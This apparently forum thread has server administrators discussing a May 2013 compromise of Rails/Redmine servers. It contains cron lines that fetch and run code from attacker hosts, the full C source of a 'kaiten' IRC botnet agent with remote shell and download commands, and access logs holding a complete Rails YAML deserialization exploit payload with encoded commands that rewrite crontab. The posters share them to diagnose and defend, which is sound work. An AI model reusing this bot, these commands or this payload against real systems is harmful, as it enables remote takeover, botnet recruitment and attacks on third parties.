Hi,

I have the same msg from my server since 3 days, any ideas to block this attempt ?

Hi,

I have the same problem.. (1 day ago)

I found just that (with syslog) :

May 24 17:24:15 localhost crontab[27812]: (my_login) DELETE (my_login)
May 24 17:24:15 localhost crontab[27818]: (my_login) LIST (my_login)
May 24 17:24:15 localhost crontab[27817]: (my_login) REPLACE (my_login)
May 24 17:24:16 localhost crontab[27821]: (my_login) DELETE (my_login)
May 24 17:24:16 localhost crontab[27827]: (my_login) LIST (my_login)
May 24 17:24:16 localhost crontab[27826]: (my_login) REPLACE (my_login)

At the moment, I didn't understand how he could do that...
By ssh is impossible because i use private key with password (PasswordAuthentication no)

---

I think the man has access because he uploaded this files whitout me noticing. (for me : "k.c" & "sh.py")
Also he run process "than.pid" with fake a name "- bash".

Be careful.

I have the same problem!

This is really CRAZY! How is this even possible that someone can get into the Servers?
Even I have the same issue too.

The server crontab is being overridden with this:

 1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;

This happened twice in the last 3 days. Not sure how anyone can get into the server and do this.

On which data center you are seeing this issue? Ours is on Linode.
Hope its not related to the Security concerns that happened a few weeks ago.

What did you do to fix that?

Hi,

I have a personal server at home, I'm not using any data center.

I really don't know how this man got into the server. And i can't believe it is by ssh.. I'm going to look at every logs on my server. I suspect the guy used http protocol.. But I'm really not sure.

At the moment, I haven't fixed that, and i think to reinstall my system to be sure to reset all access and maybe remove suspicious programs.

Can you tell me briefly what you mean by "security concerns" ? I wonder if he managed to access by one of my wordpress websites. Do you have any website (wordpress type) ?

Check your temporaries folders (/var/tmp & /tmp & ...). Because I saw suspicious program files with fake creation dates...

Thanks

Do you have a redmine ?

Hi,

We have the same problem on customer servers dedicated to a custom Ruby on Rails application.
I have noticed different crontab during the past four days (since 23th of May).

On 2013-05-23:

• 1 * * * wget -O /var/tmp/k.c 188.190.124.120/kaiten-src.c && gcc -o /var/tmp/ka /var/tmp/k.c && chmod +x /var/tmp/ka && /var/tmp/ka

On 2013-05-24:
1 * * * * wget -O /var/tmp/k colkolduld.com/req/work.php && chmod +x /var/tmp/k && /var/tmp/k

Today:
1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;

I suspect (but I have no clue ^^) the root vulnerability which give access to the server might be related to Ruby on Rails. We are using:

• Ruby 1.9.3 p327
• Ruby On Rails 3.2.11

And we didn't manage to update our servers because we are still in heavy development mode.

We tried to change root password as quick fix but it didn't stop the attacker (I am even not sure that he needs/uses root access as he overrides user-level crontab...).

Regards.

Here is the code of kaiten-src.c, kind of botnet agent which was uploaded and run repetitively since the first crontab intrusion:

////////////////////////////////////////////////////////////////////////////////
// EDIT THESE //
////////////////////////////////////////////////////////////////////////////////
#undef STARTUP // Start on startup?
#undef IDENT // Only enable this if you absolutely have to
#define FAKENAME "- bash" // What you want this to hide as
#define CHAN "#rails" // Channel to join
#define TEMPDIR "/var/tmp" // Where to save generated ips text file
#define KEY "" // The key of the channel
#define VERSION "0.1" // dfnctsc-kaiten release version
#define PORT 6667 // Port of server(s)
int numservers = 1; // Must change this to equal number of servers down there
char servers[] = {// List the servers in that format, always end in (void)0
"cvv4you.ru",
"188.190.124.120",
(void*) 0
};
////////////////////////////////////////////////////////////////////////////////
// STOP HERE! //
////////////////////////////////////////////////////////////////////////////////
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

int sock, changeservers = 0;
char *server, *chan, *key, *nick, *ident, *user, execfile[256], dispass[256];
unsigned int *pids;
unsigned long spoofs = 0, spoofsm = 0, numpids = 0, running = 0;

int strwildmatch(const char* pattern, const char* string) {
switch (pattern) {
case '\0': return *string;
case '': return !(!strwildmatch(pattern + 1, string) || *string && !strwildmatch(pattern, string + 1));
case '?': return !(*string && !strwildmatch(pattern + 1, string + 1));
default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern + 1, string + 1));
}
}

int send_msg(int sock, char *words, ...) {
static char textBuffer[1024];
va_list args;
va_start(args, words);
vsprintf(textBuffer, words, args);
va_end(args);
return write(sock, textBuffer, strlen(textBuffer));
}

int mfork(char sender) {
unsigned int parent, *newpids, i;
parent = fork();
if (parent <= 0) return parent;
numpids++;
newpids = (unsigned int) malloc((numpids + 1) * sizeof (unsigned int));
for (i = 0; i < numpids - 1; i++) newpids[i] = pids[i];
newpids[numpids - 1] = parent;
free(pids);
pids = newpids;
return parent;
}

void filter(char *a) {
while (a[strlen(a) - 1] == '\r' || a[strlen(a) - 1] == '\n') a[strlen(a) - 1] = 0;
}

char makestring() {
char *tmp;
int len = 9, i;
tmp = (char) malloc(len + 1);
memset(tmp, 0, len + 1);
for (i = 0; i < len; i++) tmp[i] = (rand() % (91 - 65)) + 65;
return tmp;
}

long pow(long a, long b) {
if (b == 0) return 1;
if (b == 1) return a;
return a * pow(a, b - 1);
}

u_short in_cksum(u_short *addr, int len) {
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) w;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}

void get(int sock, char sender, int argc, char **argv) {
int sock2, i, d;
struct sockaddr_in server;
unsigned long ipaddr;
char buf[1024];
FILE *file;
unsigned char bufm[4096];
if (mfork(sender) != 0) return;
if (argc < 2) {
send_msg(sock, "PRIVMSG %s :GET \n", sender);
exit(0);
}
if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
send_msg(sock, "PRIVMSG %s :Unable to create socket.\n", sender);
exit(0);
}
if (!strncmp(argv[1], "http://", 7)) strcpy(buf, argv[1] + 7);
else strcpy(buf, argv[1]);
for (i = 0; i < strlen(buf) && buf[i] != '/'; i++);
buf[i] = 0;
server.sin_family = AF_INET;
server.sin_port = htons(80);
if ((ipaddr = inet_addr(buf)) == -1) {
struct hostent *hostm;
if ((hostm = gethostbyname(buf)) == NULL) {
send_msg(sock, "PRIVMSG %s :Unable to resolve address.\n", sender);
exit(0);
}
memcpy((char) &server.sin_addr, hostm->h_addr, hostm->h_length);
} else server.sin_addr.s_addr = ipaddr;
memset(&(server.sin_zero), 0, 8);
if (connect(sock2, (struct sockaddr *) &server, sizeof (server)) != 0) {
send_msg(sock, "PRIVMSG %s :Unable to connect to http.\n", sender);
exit(0);
}

send_msg(sock2, "GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n", buf + i + 1, buf);
send_msg(sock, "PRIVMSG %s :Receiving file.\n", chan);
file = fopen(argv[2], "wb");
while (1) {
    int i;
    if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
    if (i < 4096) bufm[i] = 0;
    for (d = 0; d < i; d++) if (!strncmp(bufm + d, "\r\n\r\n", 4)) {
            for (d += 4; d < i; d++) fputc(bufm[d], file);
            goto done;
        }
}

done:
send_msg(sock, "PRIVMSG %s :Saved as %s\n", chan, argv[2]);
while (1) {
int i, d;
if ((i = recv(sock2, bufm, 4096, 0)) <= 0) break;
if (i < 4096) bufm[i] = 0;
for (d = 0; d < i; d++) fputc(bufm[d], file);
}
fclose(file);
close(sock2);
exit(0);
}

void nickc(int sock, char *sender, int argc, char **argv) {
if (argc != 1) {
send_msg(sock, "PRIVMSG %s :NICK \n", sender);
return;
}
if (strlen(argv[1]) >= 10) {
send_msg(sock, "PRIVMSG %s :Nick cannot be larger than 9 characters.\n", sender);
return;
}
send_msg(sock, "NICK %s\n", argv[1]);
}

struct iphdr {
unsigned int ihl : 4, version : 4;
unsigned char tos;
unsigned short tot_len;
unsigned short id;
unsigned short frag_off;
unsigned char ttl;
unsigned char protocol;
unsigned short check;
unsigned long saddr;
unsigned long daddr;
};

struct udphdr {
unsigned short source;
unsigned short dest;
unsigned short len;
unsigned short check;
};

struct tcphdr {
unsigned short source;
unsigned short dest;
unsigned long seq;
unsigned long ack_seq;
unsigned short res1 : 4, doff : 4;
unsigned char fin : 1, syn : 1, rst : 1, psh : 1, ack : 1, urg : 1, ece : 1, cwr : 1;
unsigned short window;
unsigned short check;
unsigned short urg_ptr;
};

struct send_tcp {
struct iphdr ip;
struct tcphdr tcp;
char buf[20];
};

struct pseudo_header {
unsigned int source_address;
unsigned int dest_address;
unsigned char placeholder;
unsigned char protocol;
unsigned short tcp_length;
struct tcphdr tcp;
char buf[20];
};

unsigned int host2ip(char *sender, char *hostname) {
static struct in_addr i;
struct hostent *h;
if ((i.s_addr = inet_addr(hostname)) == -1) {
if ((h = gethostbyname(hostname)) == NULL) {
send_msg(sock, "PRIVMSG %s :Unable to resolve %s\n", sender, hostname);
exit(0);
}
bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
}
return i.s_addr;
}

void move(int sock, char *sender, int argc, char **argv) {
if (argc < 1) {
send_msg(sock, "PRIVMSG %s :MOVE \n", sender);
exit(1);
}
server = strdup(argv[1]);
changeservers = 1;
close(sock);
}

void killd(int sock, char *sender, int argc, char **argv) {
kill(0, 9);
}

void help(int sock, char *sender, int argc, char **argv) {
if (mfork(sender) != 0) return;
send_msg(sock, "NOTICE %s :NICK = Changes the nick of the client\n", sender);
send_msg(sock, "NOTICE %s :SERVER = Changes servers\n", sender);
send_msg(sock, "NOTICE %s :KILL = Kills the client\n", sender);
send_msg(sock, "NOTICE %s :GET = Downloads a file off the web and saves it onto the hd\n", sender);
send_msg(sock, "NOTICE %s :HELP = Displays this\n", sender);
send_msg(sock, "NOTICE %s :IRC = send_msgs this command to the server\n", sender);
send_msg(sock, "NOTICE %s :SH = Executes a command\n", sender);
exit(0);
}

struct FMessages {
char cmd;
void ( func)(int, char , int, char *);
} flooders[] = {

{ "NICK", nickc},
{ "SERVER", move},
{ "GET", get},
{ "KILL", killd},
{ "HELP", help},

{ (char *) 0, (void (*)(int, char *, int, char **))0}

};

void _PRIVMSG(int sock, char sender, char *str) {
int i;
char *to, *message;
for (i = 0; i < strlen(str) && str[i] != ' '; i++);
str[i] = 0;
to = str;
message = str + i + 2;
for (i = 0; i < strlen(sender) && sender[i] != '!'; i++);
sender[i] = 0;
if (*message == '!' && !strcasecmp(to, chan)) {
char *params[12], name[1024] = {0};
int num_params = 0, m;
message++;
for (i = 0; i < strlen(message) && message[i] != ' '; i++);
message[i] = 0;
if (strwildmatch(message, nick)) return;
message += i + 1;
if (!strncmp(message, "IRC ", 4)) send_msg(sock, "%s\n", message + 4);
if (!strncmp(message, "SH ", 3)) {
char buf[1024];
FILE *command;
if (mfork(sender) != 0) return;
memset(buf, 0, 1024);
sprintf(buf, "export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s", message + 3);
command = popen(buf, "r");
while (!feof(command)) {
memset(buf, 0, 1024);
fgets(buf, 1024, command);
send_msg(sock, "PRIVMSG %s :%s\n", chan, buf);
sleep(1);
}
pclose(command);
exit(0);
}
m = strlen(message);
for (i = 0; i < m; i++) {
if (*message == ' ' || *message == 0) break;
name[i] = *message;
message++;
}
for (i = 0; i < strlen(message); i++) if (message[i] == ' ') num_params++;
num_params++;
if (num_params > 10) num_params = 10;
params[0] = name;
params[num_params + 1] = "\0";
m = 1;
while (*message != 0) {
message++;
if (m >= num_params) break;
for (i = 0; i < strlen(message) && message[i] != ' '; i++);
params[m] = (char) malloc(i + 1);
strncpy(params[m], message, i);
params[m][i] = 0;
m++;
message += i;
}
for (m = 0; flooders[m].cmd != (char *) 0; m++) {
if (!strcasecmp(flooders[m].cmd, name)) {
flooders[m].func(sock, sender, num_params - 1, params);
for (i = 1; i < num_params; i++) free(params[i]);
return;
}
}
}
}

void _376(int sock, char *sender, char *str) {
send_msg(sock, "MODE %s -ix\n", nick);
send_msg(sock, "JOIN %s :%s\n", chan, key);
send_msg(sock, "WHO %s\n", nick);
}

void _PING(int sock, char *sender, char *str) {
send_msg(sock, "PONG %s\n", str);
}

void _352(int sock, char sender, char *str) {
int i, d;
char *msg = str;
struct hostent *hostm;
unsigned long m;
for (i = 0, d = 0; d < 5; d++) {
for (; i < strlen(str) && *msg != ' '; msg++, i++);
msg++;
if (i == strlen(str)) return;
}
for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
msg[i] = 0;
if (!strcasecmp(msg, nick) && !spoofsm) {
msg = str;
for (i = 0, d = 0; d < 3; d++) {
for (; i < strlen(str) && *msg != ' '; msg++, i++);
msg++;
if (i == strlen(str)) return;
}
for (i = 0; i < strlen(msg) && msg[i] != ' '; i++);
msg[i] = 0;
if ((m = inet_addr(msg)) == -1) {
if ((hostm = gethostbyname(msg)) == NULL) {
send_msg(sock, "PRIVMSG %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n", sender);
return;
}
memcpy((char) &m, hostm->h_addr, hostm->h_length);
}
((char*) &spoofs)[3] = ((char*) &m)[0];
((char*) &spoofs)[2] = ((char*) &m)[1];
((char*) &spoofs)[1] = ((char*) &m)[2];
((char*) &spoofs)[0] = 0;
spoofsm = 256;
}
}

void _433(int sock, char *sender, char *str) {
free(nick);
nick = makestring();
}

void _NICK(int sock, char *sender, char *str) {
int i;
for (i = 0; i < strlen(sender) && sender[i] != '!'; i++);
sender[i] = 0;
if (!strcasecmp(sender, nick)) {
if (*str == ':') str++;
if (nick) free(nick);
nick = strdup(str);
}
}

struct Messages {
char cmd;
void ( func)(int, char , char *);
} msgs[] = {
{ "352", _352},
{ "376", _376},
{ "433", _433},
{ "422", _376},
{ "PRIVMSG", _PRIVMSG},
{ "PING", _PING},
{ "NICK", _NICK},
{ (char *) 0, (void ()(int, char *, char *))0}
};

void con() {
struct sockaddr_in srv;
unsigned long ipaddr, start;
int flag;
struct hostent hp;
start:
sock = -1;
flag = 1;
if (changeservers == 0) server = servers[rand() % numservers];
changeservers = 0;
while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
if (inet_addr(server) == 0 || inet_addr(server) == -1) {
if ((hp = gethostbyname(server)) == NULL) {
server = NULL;
close(sock);
goto start;
}
bcopy((char) hp->h_addr, (char*) &srv.sin_addr, hp->h_length);
} else srv.sin_addr.s_addr = inet_addr(server);
srv.sin_family = AF_INET;
srv.sin_port = htons(PORT);
ioctl(sock, FIONBIO, &flag);
start = time(NULL);
while (time(NULL) - start < 10) {
errno = 0;
if (connect(sock, (struct sockaddr *) &srv, sizeof (srv)) == 0 || errno == EISCONN) {
setsockopt(sock, SOL_SOCKET, SO_LINGER, 0, 0);
setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, 0, 0);
setsockopt(sock, SOL_SOCKET, SO_KEEPALIVE, 0, 0);
return;
}
if (!(errno == EINPROGRESS || errno == EALREADY)) break;
sleep(1);
}
server = NULL;
close(sock);
goto start;
}

int lockfile() {
int pid_file = open("/tmp/tan.pid", O_CREAT | O_RDWR, 0666);
int rc = flock(pid_file, LOCK_EX | LOCK_NB);
if (rc && EWOULDBLOCK == errno) {
printf("Lockfile found. Exiting.");
exit(0);
}
}

int main(int argc, char **argv) {
lockfile();
int on, i;
char cwd[256], str;
FILE *file;
#ifdef STARTUP
str = "/etc/rc.d/rc.local";
file = fopen(str, "r");
if (file == NULL) {
str = "/etc/rc.conf";
file = fopen(str, "r");
}
if (file != NULL) {
char outfile[256], buf[1024];
int i = strlen(argv[0]), d = 0;
getcwd(cwd, 256);
if (strcmp(cwd, "/")) {
while (argv[0][i] != '/') i--;
sprintf(outfile, "\"%s%s\"\n", cwd, argv[0] + i);
while (!feof(file)) {
fgets(buf, 1024, file);
if (!strcasecmp(buf, outfile)) d++;
}
if (d == 0) {
FILE *out;
fclose(file);
out = fopen(str, "a");
if (out != NULL) {
fputs(outfile, out);
fclose(out);
}
} else fclose(file);
} else fclose(file);
}
#endif
if (fork()) exit(0);
#ifdef FAKENAME
strncpy(argv[0], FAKENAME, strlen(argv[0]));
for (on = 1; on < argc; on++) memset(argv[on], 0, strlen(argv[on]));
#endif
srand((time(NULL) ^ getpid()) + getppid());
nick = makestring();
ident = makestring();
user = "raft";
chan = CHAN;
key = KEY;
server = NULL;
sa:
#ifdef IDENT
for (i = 0; i < numpids; i++) {
if (pids[i] != 0 && pids[i] != getpid()) {
kill(pids[i], 9);
waitpid(pids[i], NULL, WNOHANG);
}
}
pids = NULL;
numpids = 0;
identd();
#endif
con();
send_msg(sock, "NICK %s\nUSER %s localhost localhost :%s\n", nick, ident, user);
while (1) {
unsigned long i;
fd_set n;
struct timeval tv;
FD_ZERO(&n);
FD_SET(sock, &n);
tv.tv_sec = 60 * 20;
tv.tv_usec = 0;
if (select(sock + 1, &n, (fd_set) 0, (fd_set*) 0, &tv) <= 0) goto sa;
for (i = 0; i < numpids; i++) if (waitpid(pids[i], NULL, WNOHANG) > 0) {
unsigned int newpids, on;
for (on = i + 1; on < numpids; on++) pids[on - 1] = pids[on];
pids[on - 1] = 0;
numpids--;
newpids = (unsigned int) malloc((numpids + 1) * sizeof (unsigned int));
for (on = 0; on < numpids; on++) newpids[on] = pids[on];
free(pids);
pids = newpids;
}
if (FD_ISSET(sock, &n)) {
char buf[4096], str;
int i;
if ((i = recv(sock, buf, 4096, 0)) <= 0) goto sa;
buf[i] = 0;
str = strtok(buf, "\n");
while (str && *str) {
char name[1024], sender[1024];
filter(str);
if (*str == ':') {
for (i = 0; i < strlen(str) && str[i] != ' '; i++);
str[i] = 0;
strcpy(sender, str + 1);
strcpy(str, str + i + 1);
} else strcpy(sender, "");
for (i = 0; i < strlen(str) && str[i] != ' '; i++);
str[i] = 0;
strcpy(name, str);
strcpy(str, str + i + 1);
for (i = 0; msgs[i].cmd != (char ) 0; i++) if (!strcasecmp(msgs[i].cmd, name)) msgs[i].func(sock, sender, str);
if (!strcasecmp(name, "ERROR")) goto sa;
str = strtok((char) NULL, "\n");
}
}
}
return 0;
}

Hi,

Ok that's why I asked if one of you have redmine. Because I found interesting logs.

I think he uses "/login?back_url="

nginx/access.log (My redmine)

17510: 88.198.20.247 - - [24/May/2013:15:17:34 +0200] "HEAD / HTTP/1.1" 302 0 "-" "-" "-"
.....
17584: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "POST / HTTP/1.1" 302 1256 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
17585: 88.198.20.247 - - [24/May/2013:17:24:16 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgHXc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQoGOgZFVDoMQG1ldGhvZDoLcmVzdWx0%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 4006 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17586: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 778 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17587: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3669 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17588: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "POST / HTTP/1.1" 302 904 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17589: 88.198.20.247 - - [24/May/2013:17:24:17 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCdjcm9udGFiIC1yJykKc3lzdGVtKCcoY3JvbnRhYiAtbCA7IGVjaG8gIjEgKiAqICogKiB3Z2V0IC1PIC92YXIvdG1wL2sgY29sa29sZHVsZC5jb20vcmVxL3dvcmsucGhwICYmIGNobW9kICt4IC92YXIvdG1wL2sgJiYgL3Zhci90bXAvayIpIHwgY3JvbnRhYiAtJykKc3lzdGVtKCd3Z2V0IC1PIC9kZXYvbnVsbCAxODguMTkwLjEyNC4xMjAvcmVxL2xvZy5waHAnKQ%253D%253D%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3760 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17590  89.100.221.85 - - [24/May/2013:18:13:47 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 17591  89.100.221.85 - - [24/May/2013:18:14:00 +0200] "-" 400 0 "-" "-" "-"
 .....
 17628  89.100.221.85 - - [24/May/2013:20:39:12 +0200] "-" 400 0 "-" "-" "-"
 17629: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "POST / HTTP/1.1" 302 1200 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17630: 88.198.20.247 - - [24/May/2013:21:14:04 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3Fid%3D%250A---%250A%2521ruby%252Fobject%253AGem%253A%253ARequirement%250Arequirements%253A%250A%2B%2B-%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253AAbstract%253A%253ASessionHash%250A%2B%2B%2B%2B%2B%2Benv%253A%250A%2B%2B%2B%2B%2B%2B%2B%2BHTTP_COOKIE%253A%2B%2522a%253DBAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQc6DkBpbnN0YW5jZW86CEVSQgY6CUBzcmNJIgGpc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycpCgY6BkVUOgxAbWV0aG9kOgtyZXN1bHQ%253D%2522%250A%2B%2B%2B%2B%2B%2Bby%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%250A%2B%2B%2B%2B%2B%2B%2B%2Bcoder%253A%2B%2521ruby%252Fobject%253ARack%253A%253ASession%253A%253ACookie%253A%253ABase64%253A%253AMarshal%2B%257B%257D%250A%2B%2B%2B%2B%2B%2B%2B%2Bkey%253A%2Ba%250A%2B%2B%2B%2B%2B%2B%2B%2Bsecrets%253A%2B%255B%255D%250A%2B%2B%2B%2B%2B%2Bexists%253A%2Btrue%250A HTTP/1.1" 200 3948 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17631: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 706 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17632: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FmdalXTOJwb%3D---%2B%2521ruby%252Fhash%253AActionDispatch%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527LR%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AOpenStruct%250A%2Btable%253A%250A%2B%2B%253Adefaults%253A%2B%257B%257D%250A HTTP/1.1" 200 3601 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17633: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "POST / HTTP/1.1" 302 832 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17634: 88.198.20.247 - - [24/May/2013:21:14:05 +0200] "GET /login?back_url=http%3A%2F%2F82.239.203.55%2F%3FkFsacuPKMjhdHgm%3D---%2B%2521ruby%252Fhash%253AActionController%253A%253ARouting%253A%253ARouteSet%253A%253ANamedRouteCollection%250A%2527BJmW%253B%2Beval%2528%2525%255Bc3lzdGVtKCd3Z2V0IGh0dHA6Ly84OC4xOTguMjAuMjQ3L2suYyAtTyAvdG1wL2suYzsgZ2NjIC1vIC90bXAvayAvdG1wL2suYzsgY2htb2QgK3ggL3RtcC9rOyAvdG1wL2t8fHdnZXQgaHR0cDovLzg4LjE5OC4yMC4yNDcvayAtTyAvdG1wL2sgJiYgY2htb2QgK3ggL3RtcC9rICYmIC90bXAvaycp%255D.unpack%2528%2525%255Bm0%255D%2529%255B0%255D%2529%253B%2527%2B%253A%2B%2521ruby%252Fobject%253AActionController%253A%253ARouting%253A%253ARoute%250A%2Bsegments%253A%2B%255B%255D%250A%2Brequirements%253A%250A%2B%2B%2B%253AFXX%253A%250A%2B%2B%2B%2B%2B%253AxxqntMoR%253A%2B%253ANLOFpSw%250A HTTP/1.1" 200 3691 "-" "python-requests/1.2.0 CPython/2.7.3 Linux/3.2.0-4-amd64" "-"
 17635  89.100.221.85 - - [24/May/2013:21:40:43 +0200] "-" 400 0 "-" "-" "-"
 17636  89.100.221.85 - - [24/May/2013:21:44:10 +0200] "GET / HTTP/1.1" 304 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
 .....
 17836: 88.198.20.247 - - [24/May/2013:23:10:01 +0200] "POST / HTTP/1.1" 302 1396 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.22 (KHTML, like Gecko) Ubuntu Chromium/25.0.1364.160 Chrome/25.0.1364.160 Safari/537.22" "-"
